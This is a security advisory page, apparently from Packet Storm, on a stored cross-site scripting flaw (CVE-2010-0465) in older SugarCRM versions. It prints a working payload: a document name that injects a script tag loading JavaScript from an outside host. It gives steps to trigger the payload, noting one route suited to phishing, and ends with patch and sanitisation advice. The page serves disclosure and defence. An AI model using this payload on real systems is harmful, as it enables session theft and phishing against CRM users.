what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SugarCRM Cross Site Scripting

SugarCRM Cross Site Scripting
Posted Mar 16, 2010
Authored by Jeromie Jackson

SugarCRM versions prior to 5.5.0a and 5.2.0l suffer from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2010-0465
SHA-256 | 589558f8272dbb655838d522cc9d7e45795796d7c1686e097ad7fc2d61680e34

SugarCRM Cross Site Scripting

Change Mirror Download
Class: Stored Cross Site Scripting (XSS)

CVE: CVE-2010-0465

Remote: Yes

Local: Yes

Published: Jan 1, 2010 12:01AM

Timeline: Submission to Mitre: January 29, 2010

Vendor Contact: February 18, 2010

Vendor Response: February 19, 2010

Patch Available: March 10, 2010

Credit: Jeromie Jackson CISSP, CISM

COBIT & ITIL Certified

President- San Diego Open Web Application Security Project (OWASP)

Vice President- San Diego Information Audit & Control Association
(ISACA)

SANS Mentor

Blog: www.JeromieJackson.com

Twitter: www.twitter.com/Security_Sifu


Validated Vulnerable:

All previous version of SugarCRM prior to 5.5.0a and 5.2.0l


Discussion:


A Stored Cross-Site Scripting (XSS) vulnerability was found within
SugarCRM. The vulnerability is exploited through the online Documents
section of the application. By crafting a name that includes XSS code it
is possible to inject malicious data, redirect the user to a bogus
replica of the real website, or other nefariousactivity.



Exploit:

There are two ways that have been used to exploit this vulnerability. In
both instances, make a document with the following Document Name:


pwn3d<SCRIPT SRC="http://www.jeromiejackson.com/sugarcrm.js"></SCRIPT>



Example #1


Within the SugarCRM User Interface (UI) go to the Documents List. Click
on the one just created. This will execute the script. You will see the
script right in the document list- very obvious to most users that
something doesn't look right. The next example is slighly more covert.



Example #2


Within the SugarCRM UI go to the Document List. Hover over the Document
Name you just created, right-click, and then copy the URL location. You
will see the URL does not have any of the scripting, it has been
replaced with queries directly to a Record variable within the
application. This would probably be the tact a Phisher would take.



Solution:

A patch has been made available via the vendor. It is recommended a
routine to sanitize user input be consistently implemented throughout
the application to mitigate other such occurrences within the
application.




Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close